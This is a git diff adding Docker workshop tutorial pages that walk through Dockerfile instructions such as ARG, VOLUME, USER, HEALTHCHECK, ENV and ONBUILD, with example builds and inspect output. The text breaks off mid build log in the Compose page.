100644 index 0000000..0fdaa93 --- /dev/null +++ b/content/en/docker/a13.ARG-instruction 2.md @@ -0,0 +1,184 @@ +--- +title: "Dockerfile Lab - ARG instruction" +slug: "Dockerfile-Lab-ARG-instruction" +--- + + +```dockerfile +FROM alpine + +ENV key1="ENV is stronger than an ARG" +RUN echo ${key1} +ARG key1="not going to matter" +RUN echo ${key1} + +RUN echo ${key2} +ARG key2="defaultValue" +RUN echo ${key2} +ENV key2="ENV value takes over" +RUN echo ${key2} +CMD ["sh"] +``` + +#### Build Dockerfile + +```sh + Dockerfile git:(main) βœ— docker build -t sangam14/arg-dockerfile -f dockerfile.arg . +[+] Building 3.5s (11/11) FINISHED + => [internal] load build definition from dockerfile.arg 0.0s + => => transferring dockerfile: 336B 0.0s + => [internal] load .dockerignore 0.0s + => => transferring context: 2B 0.0s + => [internal] load metadata for docker.io/library/alpine:latest 2.2s + => [auth] library/alpine:pull token for registry-1.docker.io 0.0s + => CACHED [1/6] FROM docker.io/library/alpine@sha256:69665d02cb32192e52e07644d76bc6f25abeb5410edc1c7a81a10ba3f0efb90a 0.0s + => [2/6] RUN echo ENV is stronger than an ARG 0.2s + => [3/6] RUN echo not going to matter 0.1s + => [4/6] RUN echo ${key2} 0.3s + => [5/6] RUN echo defaultValue 0.2s + => [6/6] RUN echo ENV value takes over 0.3s + => exporting to image 0.0s + => => exporting layers 0.0s + => => writing image sha256:acf55f3ef13e44ff24acf18f9c6320e5af33aa3eb9789274a46f47a9dff6d474 0.0s + => => naming to docker.io/sangam14/arg-dockerfile + + ``` + +#### Inspect Env variable + +```sh +docker image inspect --format '{{json .Config}}' sangam14/arg-demo:1.0 | jq '.Env' + +``` + +output + +```sh +docker image inspect --format '{{json .Config}}' sangam14/arg-dockerfile | jq '.Env' +[ + "PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin", + "key1=ENV is stronger than an ARG", + "key2=ENV value takes over" +] +``` +docker container run sangam14/arg-dockerfile env + +```sh +docker container run sangam14/arg-dockerfile env +PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin +HOSTNAME=7b09d8fffd50 +key1=ENV is stronger than an ARG +key2=ENV value takes over +HOME=/root + +``` +#### Pass env values while building dockerfile + +```sh +docker build --rm --build-arg key1="buildTimeValue" --build-arg key2="good till env instruction" --tag sangam14/arg-dockerfile1 -f dockerfile.arg . +Sending build context to Docker daemon 50.18kB +Step 1/11 : FROM alpine +latest: Pulling from library/alpine +af6eaf76a39c: Already exists +Digest: sha256:69665d02cb32192e52e07644d76bc6f25abeb5410edc1c7a81a10ba3f0efb90a +Status: Downloaded newer image for alpine:latest + ---> d74e625d9115 +Step 2/11 : ENV key1="ENV is stronger than an ARG" + ---> Running in 93620e2ca3e2 +Removing intermediate container 93620e2ca3e2 + ---> e5eaad1dfbfa +Step 3/11 : RUN echo ${key1} + ---> Running in bf14143efff7 +ENV is stronger than an ARG +Removing intermediate container bf14143efff7 + ---> 2936757fac41 +Step 4/11 : ARG key1="not going to matter" + ---> Running in 161bf9d911e7 +Removing intermediate container 161bf9d911e7 + ---> 87ff1f1e4c1b +Step 5/11 : RUN echo ${key1} + ---> Running in 2e69ff7a2d91 +ENV is stronger than an ARG +Removing intermediate container 2e69ff7a2d91 + ---> af66f1b039df +Step 6/11 : RUN echo ${key2} + ---> Running in 5dd29054ba99 + +Removing intermediate container 5dd29054ba99 + ---> f575cd74046a +Step 7/11 : ARG key2="defaultValue" + ---> Running in 757002f257f0 +Removing intermediate container 757002f257f0 + ---> d60933ac5ef5 +Step 8/11 : RUN echo ${key2} + ---> Running in 742bdd38d1e0 +good till env instruction +Removing intermediate container 742bdd38d1e0 + ---> b32166e66170 +Step 9/11 : ENV key2="ENV value takes over" + ---> Running in 1bedb017ed72 +Removing intermediate container 1bedb017ed72 + ---> c8a4d9a2fd20 +Step 10/11 : RUN echo ${key2} + ---> Running in 96dbe6d53412 +ENV value takes over +Removing intermediate container 96dbe6d53412 + ---> 6270d392443c +Step 11/11 : CMD ["sh"] + ---> Running in b13a9ae5798f +Removing intermediate container b13a9ae5798f + ---> 9f878f6fe503 +Successfully built 9f878f6fe503 +Successfully tagged sangam14/arg-dockerfile1:latest +``` + +#### Inspect Env of new docker image + +```sh +docker image inspect --format '{{json .Config}}' sangam14/arg-dockerfile1:latest | jq '.Env' +[ + "PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin", + "key1=ENV is stronger than an ARG", + "key2=ENV value takes over" +] +``` + +```sh +docker container run sangam14/arg-dockerfile1 env +PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin +HOSTNAME=dff7e104aadb +key1=ENV is stronger than an ARG +key2=ENV value takes over +HOME=/root + +``` + + +cat dockerfile.arg1 + +```Dockerfile + +FROM alpine + +ENV lifecycle="production" +RUN echo ${lifecycle} +ARG username="35" +RUN echo ${username} +ARG appdir +RUN echo ${appdir} + +ADD hello /${appdir}/ +RUN chown -R ${username}:${username} ${appdir} +WORKDIR ${appdir} +USER ${username} + +CMD ["./hello"] + +``` + +#### build docker image and pass build args + +```sh +docker build --build-arg username=35 --build-arg appdir="/opt/hello" -t sangam14/arg1-dockerfile -f dockerfile.arg1 . +``` + diff --git a/content/en/docker/a14.Volume-Instruction 2.md b/content/en/docker/a14.Volume-Instruction 2.md new file mode 100644 index 0000000..c84f564 --- /dev/null +++ b/content/en/docker/a14.Volume-Instruction 2.md @@ -0,0 +1,130 @@ +--- +title: "Dockerfile Lab - Volume instruction" +slug: "Dockerfile-Lab-Volume-instruction" +--- + + +cat dockerfile.vol + +```Dockerfile +FROM alpine +RUN mkdir /myvol +RUN echo "hello world" > /myvol/greeting +VOLUME /myvol +CMD ["sh"] + +``` + +#### Build above dockerfile + +```sh +docker build -t sangam14/vol-dockerfile -f dockerfile.vol . +[+] Building 0.4s (7/7) FINISHED + => [internal] load build definition from dockerfile.vol 0.0s + => => transferring dockerfile: 140B 0.0s + => [internal] load .dockerignore 0.0s + => => transferring context: 2B 0.0s + => [internal] load metadata for docker.io/library/alpine:latest 0.0s + => CACHED [1/3] FROM docker.io/library/alpine 0.0s + => [2/3] RUN mkdir /myvol 0.2s + => [3/3] RUN echo "hello world" > /myvol/greeting 0.2s + => exporting to image 0.0s + => => exporting layers 0.0s + => => writing image sha256:7d9ebad9eb42a7006dbb89c1a544e5fcbce3de83cb470210b89adf4ffc4670db 0.0s + => => naming to docker.io/sangam14/vol-dockerfile 0.0s +``` + +#### run dockerg + +```sh +docker run --rm -it --mount source=myvolsrc,target=/myvol sangam14/vol-dockerfile +``` + +output + +```sh +docker run --rm -it --mount source=myvolsrc,target=/myvol sangam14/vol-dockerfile +/ # ls +bin dev etc home lib media mnt myvol opt proc root run sbin srv sys tmp usr var +/ # cat myvol/greeting +hello world + +``` +#### check it out all mounted volumes + +```sh +docker volume ls + +``` +output + +```sh +Dockerfile git:(main) βœ— docker volume ls +DRIVER VOLUME NAME +local myvolsrc + +``` + +#### run container + +```sh +docker run --rm -d --name vol-demo sangam14/vol-dockerfile tail -f /dev/null +76a5bfedc0a43bde7f2788fec5e5aafaa94854f16f960ed736ba598b80560f8d + +``` + +```sh +docker ps +CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES +76a5bfedc0a4 sangam14/vol-dockerfile "tail -f /dev/null" About a minute ago Up About a minute vol-demo +``` +#### stop running container + +```sh +docker container stop vol-demo +vol-demo + +``` + +#### lets run container + +```sh +docker run -d --name vol-demo --mount source=myvolsrc,target=/myvol sangam14/vol-dockerfile tail -f /dev/null +``` +#### exec into running container + +```sh + Dockerfile git:(main) βœ— docker container exec vol-demo ls -l /myvol +total 4 +-rw-r--r-- 1 root root 12 Mar 2 19:47 greeting + +``` +#### check it out mount point using docker inspect + +```sh + +docker volume inspect myvolsrc -f "{{.Mountpoint}}" +``` + +#### stop running container + +```sh +docker container stop vol-demo +``` +#### remove container + +```sh +docker container rm vol-demo + +``` +#### remove volume + +```sh +docker volume rm myvolsrc +``` +#### verify once + +```sh +docker volume ls +docker container ls +``` diff --git a/content/en/docker/a15.User-Instruction 2.md b/content/en/docker/a15.User-Instruction 2.md new file mode 100644 index 0000000..e3aec66 --- /dev/null +++ b/content/en/docker/a15.User-Instruction 2.md @@ -0,0 +1,49 @@ +--- +title: "Dockerfile Lab - USER instruction" +slug: "Dockerfile-Lab-USER-instruction" +--- + + +cat dockerfile.user + +```Dockerfile +FROM alpine +USER dockerworkshop:dockerworkshop +CMD ["sh"] + +``` + +#### build dockerfile + +```sh +docker build -t sangam14/user-dockerfile -f dockerfile.user . +[+] Building 0.1s (5/5) FINISHED + => [internal] load build definition from dockerfile.user 0.0s + => => transferring dockerfile: 105B 0.0s + => [internal] load .dockerignore 0.0s + => => transferring context: 2B 0.0s + => [internal] load metadata for docker.io/library/alpine:latest 0.0s + => CACHED [1/1] FROM docker.io/library/alpine 0.0s + => exporting to image 0.0s + => => exporting layers 0.0s + => => writing image sha256:48482459d09aecafaa0db190d6995b6d2339c0383c6cd97fafbea288124332c7 0.0s + => => naming to docker.io/sangam14/user-dockerfile + +``` + +#### run docker container in detach mode + +```sh +docker container run -d sangam14/user-dockerfile +5880a92a14d3944a4be00a19d55a19dd941f0c1b9a7a7b9159febcc29a09ea98 + +``` + +If we check the owner of the sleep process on the host, we can see it belongs to the user with uid 1000, the one that is created in the image + + +```sh +ps aux | grep sleep +sangambiradar 22103 0.0 0.0 408111776 1168 s000 S+ 2:03AM 0:00.00 grep --color=auto --exclude-dir=.bzr --exclude-dir=CVS --exclude-dir=.git --exclude-dir=.hg --exclude-dir=.svn --exclude-dir=.idea --exclude-dir=.tox sleep + +``` diff --git a/content/en/docker/a16.HEALTHCHECK-instruction 2.md b/content/en/docker/a16.HEALTHCHECK-instruction 2.md new file mode 100644 index 0000000..5dd68a9 --- /dev/null +++ b/content/en/docker/a16.HEALTHCHECK-instruction 2.md @@ -0,0 +1,84 @@ +--- +title: "Dockerfile Lab - HEALTHCHECK instruction" +slug: "Dockerfile-Lab-HEALTHCHECK-instruction" +--- + + +cat Dockerfile + +```sh +FROM nginx + +``` + +#### build docker container + +```sh +docker build -t sangam14/healthcheck-dockerfile -f dockerfile.healthcheck . +[+] Building 1.4s (6/6) FINISHED + => [internal] load build definition from dockerfile.healthcheck 0.0s + => => transferring dockerfile: 244B 0.0s + => [internal] load .dockerignore 0.0s + => => transferring context: 2B 0.0s + => [internal] load metadata for docker.io/library/alpine:latest 0.0s + => CACHED [1/2] FROM docker.io/library/alpine 0.0s + => [2/2] RUN apk add curl 1.3s + => exporting to image 0.0s + => => exporting layers 0.0s + => => writing image sha256:2486b7b700a94a3e91237b3b8720f2b36c6e5e6b90584638db8c328a78dd90f9 0.0s + => => naming to docker.io/sangam14/healthcheck-dockerfile 0.0s +➜ Dockerfile git:(main) βœ— +``` + +### expose docker port on 80 port + +```sh +➜ Dockerfile git:(main) βœ— docker container run --rm -d -p 80:80 --name health sangam14/healthcheck-dockerfile +408e0d86098c4136dd36c7abf51ce4c6eb495d5fd33056f2b9e9a1176434853e +``` + +```sh +FROM nginx +RUN apt-get update && apt-get install -y curl && rm -rf /var/lib/apt/lists/* +HEALTHCHECK --interval=5s --timeout=3s \ + CMD curl -fs http://localhost/ || exit 1 +``` + + +### build dockerfile + +```sh + Dockerfile git:(main) βœ— docker build -t sangam14/healthcheck-dockerfile -f dockerfile.healthcheck . +[+] Building 2.7s (6/6) FINISHED + => [internal] load build definition from dockerfile.healthcheck 0.0s + => => transferring dockerfile: 227B 0.0s + => [internal] load .dockerignore 0.0s + => => transferring context: 2B 0.0s + => [internal] load metadata for docker.io/library/nginx:latest 0.0s + => CACHED [1/2] FROM docker.io/library/nginx 0.0s + => [2/2] RUN apt-get update && apt-get install -y curl && rm -rf /var/lib/apt/lists/* 2.6s + => exporting to image 0.0s + => => exporting layers 0.0s + => => writing image sha256:c3b3dc3b23772975869bb5dc0dda8d877bcc16e6b408b31938f3deb309f92da7 0.0s + => => naming to docker.io/sangam14/healthcheck-dockerfile 0.0s + + + +``` + +#### inspect healthcheck + +```sh + docker inspect --format '{{json .State.Health}}' health +{"Status":"healthy","FailingStreak":0,"Log":[{"Start":"2023-03-02T21:58:38.327900678Z","End":"2023-03-02T21:58:38.409811095Z","ExitCode":0,"Output":"\n\n\nWelcome to nginx!\n\n\n\n

Welcome to nginx!

\n

If you see this page, the nginx web server is successfully installed and\nworking. Further configuration is required.

\n\n

For online documentation and support please refer to\nnginx.org.
\nCommercial support is available at\nnginx.com.

\n\n

Thank you for using nginx.

\n\n\n"},{"Start":"2023-03-02T21:58:43.417592375Z","End":"2023-03-02T21:58:43.510278458Z","ExitCode":0,"Output":"\n\n\nWelcome to nginx!\n\n\n\n

Welcome to nginx!

\n

If you see this page, the nginx web server is successfully installed and\nworking. Further configuration is required.

\n\n

For online documentation and support please refer to\nnginx.org.
\nCommercial support is available at\nnginx.com.

\n\n

Thank you for using nginx.

\n\n\n"},{"Start":"2023-03-02T21:58:48.514938961Z","End":"2023-03-02T21:58:48.601586961Z","ExitCode":0,"Output":"\n\n\nWelcome to nginx!\n\n\n\n

Welcome to nginx!

\n

If you see this page, the nginx web server is successfully installed and\nworking. Further configuration is required.

\n\n

For online documentation and support please refer to\nnginx.org.
\nCommercial support is available at\nnginx.com.

\n\n

Thank you for using nginx.

\n\n\n"},{"Start":"2023-03-02T21:58:53.606320671Z","End":"2023-03-02T21:58:53.693584213Z","ExitCode":0,"Output":"\n\n\nWelcome to nginx!\n\n\n\n

Welcome to nginx!

\n

If you see this page, the nginx web server is successfully installed and\nworking. Further configuration is required.

\n\n

For online documentation and support please refer to\nnginx.org.
\nCommercial support is available at\nnginx.com.

\n\n

Thank you for using nginx.

\n\n\n"},{"Start":"2023-03-02T21:58:58.697104757Z","End":"2023-03-02T21:58:58.780027924Z","ExitCode":0,"Output":"\n\n\nWelcome to nginx!\n\n\n\n

Welcome to nginx!

\n

If you see this page, the nginx web server is successfully installed and\nworking. Further configuration is required.

\n\n

For online documentation and support please refer to\nnginx.org.
\nCommercial support is available at\nnginx.com.

\n\n

Thank you for using nginx.

\n\n\n"}]} + +``` + + +β˜… `--interval`: This specifies the period between each health check (the default is 30s). +
+β˜… `--timeout`: If no success response is received within this period, the health check is considered failed (the default is 30s). +
+β˜… `--start-period`: The duration to wait before running the first health check. This is used to give a startup time for the container (the default is 0s). +
+β˜… `--retries` : The container will be considered unhealthy if the health check failed consecutively for the given number of retries (the default is 3). \ No newline at end of file diff --git a/content/en/docker/a17.ENV-instruction 2.md b/content/en/docker/a17.ENV-instruction 2.md new file mode 100644 index 0000000..22b315f --- /dev/null +++ b/content/en/docker/a17.ENV-instruction 2.md @@ -0,0 +1,71 @@ +--- +title: "Dockerfile Lab - ENV instruction " +slug: "Dockerfile-Lab-ENV-instruction" +--- + + +cat dockerfile + +```dockerfile +FROM alpine +ENV appDescription This app is a sample of using ENV instructions +ENV appName=env-demo +ENV note1="The First Note First" note2=The\ Second\ Note\ Second \ + note3="The Third Note Third" +ENV changeMe="Old Value" +CMD ["sh"] + + +``` + +#### build dockerfile + +```sh + +➜ Dockerfile git:(main) βœ— docker build -t sangam14/env-dockerfile -f dockerfile.env . +[+] Building 0.1s (5/5) FINISHED + => [internal] load build definition from dockerfile.env 0.0s + => => transferring dockerfile: 279B 0.0s + => [internal] load .dockerignore 0.0s + => => transferring context: 2B 0.0s + => [internal] load metadata for docker.io/library/alpine:latest 0.0s + => CACHED [1/1] FROM docker.io/library/alpine 0.0s + => exporting to image 0.0s + => => exporting layers 0.0s + => => writing image sha256:6f9741e9b952495e61c515945c4acd85d85aef1e631b7d37c348c26e9f5d216d 0.0s + => => naming to docker.io/sangam14/env-dockerfile 0.0s + +``` + +### inspect Env Config + +```sh +docker image inspect --format '{{json .Config}}' sangam14/env-dockerfile | jq '.Env' +[ + "PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin", + "appDescription=This app is a sample of using ENV instructions", + "appName=env-demo", + "note1=The First Note First", + "note2=The Second Note Second", + "note3=The Third Note Third", + "changeMe=Old Value" +] + +``` +#### change envirmonment variable + +```sh + +docker run --rm --env changeMe="New Value" --env adhoc="run time" sangam14/env-dockerfile env +PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin +HOSTNAME=12804862fac4 +changeMe=New Value +adhoc=run time +appDescription=This app is a sample of using ENV instructions +appName=env-demo +note1=The First Note First +note2=The Second Note Second +note3=The Third Note Third +HOME=/root + +``` \ No newline at end of file diff --git a/content/en/docker/a18.ONBUILD-instruction 2.md b/content/en/docker/a18.ONBUILD-instruction 2.md new file mode 100644 index 0000000..917216f --- /dev/null +++ b/content/en/docker/a18.ONBUILD-instruction 2.md @@ -0,0 +1,95 @@ +--- +title: "Dockerfile Lab - ONBUILD instruction " +slug: "Dockerfile-Lab-ONBUILD-instruction" +--- + +#### The ONBUILD instruction + +The ONBUILD instruction is a trigger. It sets instructions that will be executed when another image is built from the image being build. + +This is useful for building images which will be used as a base to build other images. + +```sh +ONBUILD COPY . /src + +``` + +You can't chain ONBUILD instructions with ONBUILD. +ONBUILD can't be used to trigger FROM instructions. + + +```Dockerfile +FROM nginx:1.16-alpine +WORKDIR /usr/share/nginx/html +ONBUILD COPY index.html . +``` + +#### build dockerfile + +```sh +docker build -t sangam14/onbuild-dockerfile -f dockerfile.onbuild . +[+] Building 5.8s (7/7) FINISHED + => [internal] load build definition from dockerfile.onbuild 0.0s + => => transferring dockerfile: 129B 0.0s + => [internal] load .dockerignore 0.0s + => => transferring context: 2B 0.0s + => [internal] load metadata for docker.io/library/nginx:1.16-alpine 3.3s + => [auth] library/nginx:pull token for registry-1.docker.io 0.0s + => [1/2] FROM docker.io/library/nginx:1.16-alpine@sha256:5057451e461dda671da5e951019ddbff9d96a751fc7d548053523ca1f848c1ad 2.4s + => => resolve docker.io/library/nginx:1.16-alpine@sha256:5057451e461dda671da5e951019ddbff9d96a751fc7d548053523ca1f848c1ad 0.0s + => => sha256:f07e4bcf42b862c240f4c00f2f7ed362d7d93ca15151de547beda593f3b669e5 2.72MB / 2.72MB 0.8s + => => sha256:078902f02c3a797288251014301298bd748886eaf5fc107e128cc1b4933ec57d 6.25MB / 6.25MB 2.1s + => => sha256:5057451e461dda671da5e951019ddbff9d96a751fc7d548053523ca1f848c1ad 1.41kB / 1.41kB 0.0s + => => sha256:75a7ebf15c39feb30c0444c1ab8d585fe490c35dca30c337e06b73c55fb0e30f 739B / 739B 0.0s + => => sha256:c3144a54094d9628d01573952dfc7b580a76f2a3570f72b8900df676a697c1bb 6.98kB / 6.98kB 0.0s + => => extracting sha256:f07e4bcf42b862c240f4c00f2f7ed362d7d93ca15151de547beda593f3b669e5 0.1s + => => extracting sha256:078902f02c3a797288251014301298bd748886eaf5fc107e128cc1b4933ec57d 0.3s + => [2/2] WORKDIR /usr/share/nginx/html 0.0s + => exporting to image 0.0s + => => exporting layers 0.0s + => => writing image sha256:8fc6b719b70ed34467487519cca45523b18eb6f394187d50b08f5157b495efe4 0.0s + => => naming to docker.io/sangam14/onbuild-dockerfile 0.0s + ``` + + +### create another dockerfile + +```Dockerfile +From sangam14/onbuild-dockerfile +COPY index.html . + +``` +#### here you will see default ngnix index page + +```sh + docker run -p 80:80 sangam14/onbuild-dockerfile + + ``` + +#### build docker file + +```sh + +docker build -t sangam14/onbuild1-dockerfile -f dockerfile.onbuild1 . +[+] Building 0.1s (8/8) FINISHED + => [internal] load build definition from dockerfile.onbuild1 0.0s + => => transferring dockerfile: 107B 0.0s + => [internal] load .dockerignore 0.0s + => => transferring context: 2B 0.0s + => [internal] load metadata for docker.io/sangam14/onbuild-dockerfile:latest 0.0s + => [internal] load build context 0.0s + => => transferring context: 32B 0.0s + => [1/2] FROM docker.io/sangam14/onbuild-dockerfile 0.0s + => [2/2] COPY index.html . 0.0s + => [3/2] COPY index.html . 0.0s + => exporting to image 0.0s + => => exporting layers 0.0s + => => writing image sha256:c2291a76ea7cf76b5449ad476d47880b3c5b1bf0119cf7d1fe54111f88db2157 0.0s + => => naming to docker.io/sangam14/onbuild1-dockerfile +``` + +above container copied index.html form local + +```sh +docker run -p 80:80 sangam14/onbuild1-dockerfile +``` \ No newline at end of file diff --git a/content/en/docker/a19.Multiple-Container 2.md b/content/en/docker/a19.Multiple-Container 2.md new file mode 100644 index 0000000..ecd5a4f --- /dev/null +++ b/content/en/docker/a19.Multiple-Container 2.md @@ -0,0 +1,61 @@ +--- +title: "Running multiple docker containers from CLI " +slug: "Running-multiple-docker-containers-from-CLI" +--- + +#### We will create two containers (linux1, linux2) based on the same image (ubuntu) + +```sh +docker run -it -d --rm --name linux1 ubuntu /bin/bash + +``` +additional flags: +`-d`starts the container as β€œdetached”. Use β€œdocker attach” to attach to it later on. +`--rm` cleans up the container after stopping. The container will be removed, basically the same as β€œdocker rm container_identifier” after stopping the container. So everything is kept tidy. +`--name` will give the container a dedicated name, which makes it easier to address the container later on. + + +#### Creates container β€œlinux2” + +```sh +docker run -it -d --rm --name linux2 ubuntu /bin/bash +``` +#### Attaches to container linux1 +```sh +> docker attach linux1 +``` +#### Creates a new directory on container linux1 +```sh +> ls +> mkdir mylinux1 +``` +#### Shows that β€œmylinux1” was created + +```sh +> ls + +``` +#### Attaches to container linux2 + +```sh +> docker attach linux2 + +``` + Shows that the directory of linux2 is different than linux1, although they are both from the same image β€œubuntu” + They are separated, they don’t share their file-system +The bash process is isolated in the container + +```sh + +> ls + +``` +```sh +> exit +``` +Shows only one container which is running, the other one got removed +```sh +> docker ps -a + +``` + diff --git a/content/en/docker/a2.hello-world 2.md b/content/en/docker/a2.hello-world 2.md new file mode 100644 index 0000000..b6c8adf --- /dev/null +++ b/content/en/docker/a2.hello-world 2.md @@ -0,0 +1,163 @@ +--- +title: "Docker Hello World Example" +slug: Docker-Hello-World-Example +--- + +#### run your first hello world example + +```sh +docker run hello-world +``` +is a command that runs a simple Docker container to verify that Docker is correctly installed on your system and working as expected. + +When you run this command, Docker will first check if the "hello-world" image is available locally. If the image is not found, Docker will download it from the Docker Hub registry. + +Once the "hello-world" image is available, Docker will create a container from the image and run it. The container will print a message to the console to indicate that everything is working correctly. + +Here's an example of what you might see when you run docker run hello-world: + +```sh +docker run hello-world +Unable to find image 'hello-world:latest' locally +latest: Pulling from library/hello-world +7050e35b49f5: Pull complete +Digest: sha256:6e8b6f026e0b9c419ea0fd02d3905dd0952ad1feea67543f525c73a0a790fefb +Status: Downloaded newer image for hello-world:latest + +Hello from Docker! +This message shows that your installation appears to be working correctly. + +To generate this message, Docker took the following steps: + 1. The Docker client contacted the Docker daemon. + 2. The Docker daemon pulled the "hello-world" image from the Docker Hub. + (arm64v8) + 3. The Docker daemon created a new container from that image which runs the + executable that produces the output you are currently reading. + 4. The Docker daemon streamed that output to the Docker client, which sent it + to your terminal. + +To try something more ambitious, you can run an Ubuntu container with: + $ docker run -it ubuntu bash + +Share images, automate workflows, and more with a free Docker ID: + https://hub.docker.com/ + +For more examples and ideas, visit: + https://docs.docker.com/get-started/ + + +``` +#### check it out list of docker images + +```sh +dockerworkshop git:(main) βœ— docker images +REPOSITORY TAG IMAGE ID CREATED SIZE +hello-world latest 46331d942d63 11 months ago 9.14kB +``` + + +docker inspect is a command used to retrieve detailed information about one or more Docker objects, such as containers, images, networks, volumes, and more. The command allows you to inspect the configuration and state of a Docker object, including its metadata, networking information, storage configuration, and more. + +Here's the basic syntax of the docker inspect command: + +```sh +docker inspect [OPTIONS] OBJECT [OBJECT...] + +``` +- OPTIONS: Optional flags that modify the output of the command. +- OBJECT: The name or ID of the Docker object to inspect. + +For example, to inspect a running Docker container named hello-world , you could use the following command: + +```sh +docker inspect hello-world +[ + { + "Id": "sha256:46331d942d6350436f64e614d75725f6de3bb5c63e266e236e04389820a234c4", + "RepoTags": [ + "hello-world:latest" + ], + "RepoDigests": [ + "hello-world@sha256:6e8b6f026e0b9c419ea0fd02d3905dd0952ad1feea67543f525c73a0a790fefb" + ], + "Parent": "", + "Comment": "", + "Created": "2022-03-19T16:12:58.923371954Z", + "Container": "b2af51419cbf516f3c99b877a64906b21afedc175bd3cd082eb5798e2f277bb4", + "ContainerConfig": { + "Hostname": "b2af51419cbf", + "Domainname": "", + "User": "", + "AttachStdin": false, + "AttachStdout": false, + "AttachStderr": false, + "Tty": false, + "OpenStdin": false, + "StdinOnce": false, + "Env": [ + "PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin" + ], + "Cmd": [ + "/bin/sh", + "-c", + "#(nop) ", + "CMD [\"/hello\"]" + ], + "Image": "sha256:cc0fff24c4ece63ade5d9f549e42c926cf569112c4f5c439a4a57f3f33f5588b", + "Volumes": null, + "WorkingDir": "", + "Entrypoint": null, + "OnBuild": null, + "Labels": {} + }, + "DockerVersion": "20.10.12", + "Author": "", + "Config": { + "Hostname": "", + "Domainname": "", + "User": "", + "AttachStdin": false, + "AttachStdout": false, + "AttachStderr": false, + "Tty": false, + "OpenStdin": false, + "StdinOnce": false, + "Env": [ + "PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin" + ], + "Cmd": [ + "/hello" + ], + "Image": "sha256:cc0fff24c4ece63ade5d9f549e42c926cf569112c4f5c439a4a57f3f33f5588b", + "Volumes": null, + "WorkingDir": "", + "Entrypoint": null, + "OnBuild": null, + "Labels": null + }, + "Architecture": "arm64", + "Variant": "v8", + "Os": "linux", + "Size": 9136, + "VirtualSize": 9136, + "GraphDriver": { + "Data": { + "MergedDir": "/var/lib/docker/overlay2/851a7de3abc0e1977e00c9bd8976c5fa1b0d954d3dc847ae15b36539f43e90a3/merged", + "UpperDir": "/var/lib/docker/overlay2/851a7de3abc0e1977e00c9bd8976c5fa1b0d954d3dc847ae15b36539f43e90a3/diff", + "WorkDir": "/var/lib/docker/overlay2/851a7de3abc0e1977e00c9bd8976c5fa1b0d954d3dc847ae15b36539f43e90a3/work" + }, + "Name": "overlay2" + }, + "RootFS": { + "Type": "layers", + "Layers": [ + "sha256:efb53921da3394806160641b72a2cbd34ca1a9a8345ac670a85a04ad3d0e3507" + ] + }, + "Metadata": { + "LastTagTime": "0001-01-01T00:00:00Z" + } + } +] + +``` diff --git a/content/en/docker/a20.write-first-Docker_compose 2.md b/content/en/docker/a20.write-first-Docker_compose 2.md new file mode 100644 index 0000000..760a820 --- /dev/null +++ b/content/en/docker/a20.write-first-Docker_compose 2.md @@ -0,0 +1,117 @@ +--- +title: "Write First Docker Compose file " +slug: "Write-First-Docker-Compose-file" +--- + +cat Dockerfile + +```dockerfile +FROM php:7.2-apache +COPY index.php /var/www/html + +``` + +add index.php file + +```php + [internal] booting buildkit 3.8s + => => pulling image moby/buildkit:buildx-stable-1 2.8s + => => creating container buildx_buildkit_great_brahmagupta0 1.1s + => [internal] load build definition from Dockerfile 0.0s + => => transferring dockerfile: 85B 0.0s + => [internal] load .dockerignore 0.0s + => => transferring context: 2B 0.0s + => [internal] load metadata for docker.io/library/php:7.2-apache 4.3s + => [auth] library/php:pull token for registry-1.docker.io 0.0s + => [internal] load build context 0.0s + => => transferring context: 67B 0.0s + => [1/2] FROM docker.io/library/php:7.2-apache@sha256:4dc0f0115acf8c2f0df69295ae822e49f5ad5fe849725847f15aa0e5802b55f8 8.3s + => => resolve docker.io/library/php:7.2-apache@sha256:4dc0f0115acf8c2f0df69295ae822e49f5ad5fe849725847f15aa0e5802b55f8 0.0s + => => sha256:9639d8c8cc76eb6501b4135a054c1a85bd7397db1010d043bcc03d32bf6d79b6 895B / 895B 0.5s + => => sha256:119f7607f913c50661a95311027b7b944c7bf2ee9e7af5361a14b72ce4d36b34 247B / 247B 0.3s + => => sha256:c5ff78edaefc7917757ec4e434738d5561d016bedd20ebdeeee362ec53c8d200 2.27kB / 2.27kB 0.6s + => => sha256:1c04bb0b5fbe7c2927e6282625ccf4c5e0399e9da46f4a84bb8072dc98add6e5 214B / 214B 0.5s + => => sha256:709f68bc1d50527b9d9de50c516cb337468feb59c6135b414dda628d902a1bc8 13.52MB / 13.52MB 3.2s + => => sha256:9e92e56de9f5b0243dc28d80127f51f9f773d64ce4ae1ad58cfff06c2dcd4c29 494B / 494B 0.8s + => => sha256:485201b000c7ca5a73c2f9d047a204442ea5871a8a1405809d623884d83afc05 12.65MB / 12.65MB 0.9s + => => sha256:28135fd83ed1ac66e6f4288fabe4c84616cfe420e8e6808ba92d052771325ab4 517B / 517B 0.5s + => => sha256:5543a36f8eed548f436944bf39a2e918115fc9b30b54416c1081566f25716010 475B / 475B 0.6s + => => sha256:8d436d7bb0262f042a9554b5c54b25bc1d19cabbb9435747672c34d12f8dc1d0 18.58MB / 18.58MB 1.5s + => => sha256:c17a0a78e91d3ac0ec4a0c0566f57580154ead8d8967258efe94989d86cd05bd 269B / 269B 1.4s + => => sha256:30eb7a300f132babe7d5ed65f9e81a1fdd4542ecf70ac29a91bc290484dbc5e5 70.34MB / 70.34MB 3.2s + => => sha256:c9648d7fcbb6d597cf33916d8fcd207fde8ec05d764b4480d4f3e884e142a902 25.86MB / 25.86MB 3.1s + => => sha256:f88cecc04e76783f0006b9fed72be749e834825383e941e16de2565a0e4a8cc3 229B / 229B 0.5s + => => extracting sha256:c9648d7fcbb6d597cf33916d8fcd207fde8ec05d764b4480d4f3e884e142a902 0.6s + => => extracting sha256:f88cecc04e76783f0006b9fed72be749e834825383e941e16de2565a0e4a8cc3 0.0s + => => extracting sha256:30eb7a300f132babe7d5ed65f9e81a1fdd4542ecf70ac29a91bc290484dbc5e5 